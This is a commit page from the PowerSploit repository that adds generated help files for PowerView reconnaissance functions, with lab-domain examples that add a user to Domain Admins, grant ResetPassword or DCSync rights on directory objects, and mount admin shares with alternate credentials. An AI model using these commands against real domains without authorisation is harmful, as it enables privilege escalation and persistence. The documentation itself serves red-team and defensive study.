aboutsummaryrefslogtreecommitdiff
path: root/docs
diff options
context:
space:
mode:
authorHarmJ0y <will@harmj0y.net>2016-12-12 21:05:08 -0500
committerHarmJ0y <will@harmj0y.net>2016-12-12 21:05:08 -0500
commit0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809 (patch)
treeed420fc412380726daa10675fe1d0407d76b429c /docs
parent7f10db78277a6e6ac9c9c8c85b81bc4847042d78 (diff)
downloadPowerSploit-0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809.tar.gz
PowerSploit-0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809.zip
first take at platyPS doc generation
Diffstat (limited to 'docs')
-rwxr-xr-xdocs/Recon/Add-DomainGroupMember.md142
-rwxr-xr-xdocs/Recon/Add-DomainObjectAcl.md361
-rwxr-xr-xdocs/Recon/Add-RemoteConnection.md114
-rwxr-xr-xdocs/Recon/Convert-ADName.md184
-rwxr-xr-xdocs/Recon/ConvertFrom-SID.md126
-rwxr-xr-xdocs/Recon/ConvertFrom-UACValue.md127
-rwxr-xr-xdocs/Recon/ConvertTo-SID.md120
-rwxr-xr-xdocs/Recon/Export-PowerViewCSV.md117
-rwxr-xr-xdocs/Recon/Find-DomainLocalGroupMember.md351
-rwxr-xr-xdocs/Recon/Find-DomainObjectPropertyOutlier.md261
-rwxr-xr-xdocs/Recon/Find-DomainProcess.md517
-rwxr-xr-xdocs/Recon/Find-DomainShare.md335
-rwxr-xr-xdocs/Recon/Find-DomainUserEvent.md451
-rwxr-xr-xdocs/Recon/Find-DomainUserLocation.md579
-rwxr-xr-xdocs/Recon/Find-InterestingDomainAcl.md239
-rwxr-xr-xdocs/Recon/Find-InterestingDomainShareFile.md463
-rwxr-xr-xdocs/Recon/Find-InterestingFile.md248
-rwxr-xr-xdocs/Recon/Find-LocalAdminAccess.md337
-rwxr-xr-xdocs/Recon/Get-ComputerDetails.md68
-rwxr-xr-xdocs/Recon/Get-Domain.md81
-rwxr-xr-xdocs/Recon/Get-DomainComputer.md426
-rwxr-xr-xdocs/Recon/Get-DomainController.md132
-rwxr-xr-xdocs/Recon/Get-DomainDFSShare.md202
-rwxr-xr-xdocs/Recon/Get-DomainDNSRecord.md181
-rwxr-xr-xdocs/Recon/Get-DomainDNSZone.md156
-rwxr-xr-xdocs/Recon/Get-DomainFileServer.md200
-rwxr-xr-xdocs/Recon/Get-DomainForeignGroupMember.md238
-rwxr-xr-xdocs/Recon/Get-DomainForeignUser.md239
-rwxr-xr-xdocs/Recon/Get-DomainGPO.md354
-rwxr-xr-xdocs/Recon/Get-DomainGPOComputerLocalGroupMapping.md263
-rwxr-xr-xdocs/Recon/Get-DomainGPOLocalGroup.md259
-rwxr-xr-xdocs/Recon/Get-DomainGPOUserLocalGroupMapping.md258
-rwxr-xr-xdocs/Recon/Get-DomainGroup.md397
-rwxr-xr-xdocs/Recon/Get-DomainGroupMember.md401
-rwxr-xr-xdocs/Recon/Get-DomainManagedSecurityGroup.md177
-rwxr-xr-xdocs/Recon/Get-DomainOU.md316
-rwxr-xr-xdocs/Recon/Get-DomainObject.md318
-rwxr-xr-xdocs/Recon/Get-DomainObjectAcl.md251
-rwxr-xr-xdocs/Recon/Get-DomainPolicy.md159
-rwxr-xr-xdocs/Recon/Get-DomainSID.md102
-rwxr-xr-xdocs/Recon/Get-DomainSPNTicket.md136
-rwxr-xr-xdocs/Recon/Get-DomainSite.md309
-rwxr-xr-xdocs/Recon/Get-DomainSubnet.md309
-rwxr-xr-xdocs/Recon/Get-DomainTrust.md250
-rwxr-xr-xdocs/Recon/Get-DomainTrustMapping.md220
-rwxr-xr-xdocs/Recon/Get-DomainUser.md426
-rwxr-xr-xdocs/Recon/Get-DomainUserEvent.md144
-rwxr-xr-xdocs/Recon/Get-Forest.md80
-rwxr-xr-xdocs/Recon/Get-ForestDomain.md82
-rwxr-xr-xdocs/Recon/Get-ForestGlobalCatalog.md78
-rwxr-xr-xdocs/Recon/Get-ForestTrust.md91
-rwxr-xr-xdocs/Recon/Get-HttpStatus.md106
-rwxr-xr-xdocs/Recon/Get-NetComputerSiteName.md89
-rwxr-xr-xdocs/Recon/Get-NetLocalGroup.md132
-rwxr-xr-xdocs/Recon/Get-NetLocalGroupMember.md212
-rwxr-xr-xdocs/Recon/Get-NetLoggedon.md100
-rwxr-xr-xdocs/Recon/Get-NetRDPSession.md104
-rwxr-xr-xdocs/Recon/Get-NetSession.md99
-rwxr-xr-xdocs/Recon/Get-NetShare.md100
-rwxr-xr-xdocs/Recon/Get-PathAcl.md94
-rwxr-xr-xdocs/Recon/Get-RegLoggedOn.md89
-rwxr-xr-xdocs/Recon/Get-WMIProcess.md80
-rwxr-xr-xdocs/Recon/Get-WMIRegCachedRDPConnection.md99
-rwxr-xr-xdocs/Recon/Get-WMIRegLastLoggedOn.md98
-rwxr-xr-xdocs/Recon/Get-WMIRegMountedDrive.md97
-rwxr-xr-xdocs/Recon/Get-WMIRegProxy.md93
-rwxr-xr-xdocs/Recon/Invoke-Kerberoast.md233
-rwxr-xr-xdocs/Recon/Invoke-Portscan.md430
-rwxr-xr-xdocs/Recon/Invoke-ReverseDnsLookup.md106
-rwxr-xr-xdocs/Recon/Invoke-RevertToSelf.md56
-rwxr-xr-xdocs/Recon/Invoke-UserImpersonation.md100
-rwxr-xr-xdocs/Recon/New-DomainGroup.md150
-rwxr-xr-xdocs/Recon/New-DomainUser.md184
-rwxr-xr-xdocs/Recon/Remove-RemoteConnection.md84
-rwxr-xr-xdocs/Recon/Resolve-IPAddress.md66
-rwxr-xr-xdocs/Recon/Set-DomainObject.md346
-rwxr-xr-xdocs/Recon/Test-AdminAccess.md101
77 files changed, 15823 insertions, 0 deletions
diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md
new file mode 100755
index 0000000..cc563e9
--- /dev/null
+++ b/docs/Recon/Add-DomainGroupMember.md
@@ -0,0 +1,142 @@
+# Add-DomainGroupMember
+
+## SYNOPSIS
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object.
+For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
+```
+
+Adds harmj0y to 'Domain Admins' in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
+
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -Identity
+A group SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GroupName, GroupIdentity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Members
+One or more member identities, i.e.
+SamAccountName (e.g.
+Group1), DistinguishedName
+(e.g.
+CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: MemberIdentity, Member, DistinguishedName
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md
new file mode 100755
index 0000000..c530e81
--- /dev/null
+++ b/docs/Recon/Add-DomainObjectAcl.md
@@ -0,0 +1,361 @@
+# Add-DomainObjectAcl
+
+## SYNOPSIS
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Add-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]
+ [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]
+```
+
+## DESCRIPTION
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity.
+Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID.
+These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+...
+
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+\[no results returned\]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+## PARAMETERS
+
+### -TargetIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -TargetDomain
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetLDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetSearchBase
+The LDAP source to search through for targets, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalDomain
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Rights
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsGUID
+Manual GUID representing the right to add to the target.
+
+```yaml
+Type: Guid
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell)
+
diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md
new file mode 100755
index 0000000..86112e2
--- /dev/null
+++ b/docs/Recon/Add-RemoteConnection.md
@@ -0,0 +1,114 @@
+# Add-RemoteConnection
+
+## SYNOPSIS
+Pseudo "mounts" a connection to a remote path using the specified
+credential object, allowing for access of remote resources.
+If a -Path isn't
+specified, a -ComputerName is required to pseudo-mount IPC$.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Add-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>
+```
+
+### Path
+```
+Add-RemoteConnection [-Path] <String[]> -Credential <PSCredential>
+```
+
+## DESCRIPTION
+This function uses WNetAddConnection2W to make a 'temporary' (i.e.
+not saved) connection
+to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the
+-Credential object.
+If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
+
+To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path
+or -ComputerName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Cred = Get-Credential
+```
+
+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$Cred = Get-Credential
+```
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to add a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to add the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md
new file mode 100755
index 0000000..7f9f42b
--- /dev/null
+++ b/docs/Recon/Convert-ADName.md
@@ -0,0 +1,184 @@
+# Convert-ADName
+
+## SYNOPSIS
+Converts Active Directory object names between a variety of formats.
+
+Author: Bill Stewart, Pasquale Lantella
+Modifications: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Convert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
+and translates Active Directory names between various formats using the NameTranslate COM object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Convert-ADName -Identity "TESTLAB\harmj0y"
+```
+
+harmj0y@testlab.local
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
+```
+
+testlab.local/Users/krbtgt
+testlab.local/Users/Administrator
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
+```
+
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
+
+TESTLAB\harmj0y
+
+## PARAMETERS
+
+### -Identity
+Specifies the Active Directory object name to translate, of the following form:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+ SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, ObjectName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputType
+Specifies the output name type you want to convert to, which must be one of the following:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format, e.g.
+'fabrikam.com/Users/Phineas Flynn'
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more objects name strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+Outputs a string representing the converted name.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67)
+
diff --git a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md
new file mode 100755
index 0000000..186e19b
--- /dev/null
+++ b/docs/Recon/ConvertFrom-SID.md
@@ -0,0 +1,126 @@
+# ConvertFrom-SID
+
+## SYNOPSIS
+Converts a security identifier (SID) to a group/user name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName
+
+## SYNTAX
+
+```
+ConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a security identifier string (SID) to a group/user name
+using Convert-ADName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
+```
+
+TESTLAB\harmj0y
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
+```
+
+TESTLAB\WINDOWS2$
+TESTLAB\harmj0y
+BUILTIN\Distributed COM Users
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
+
+TESTLAB\harmj0y
+
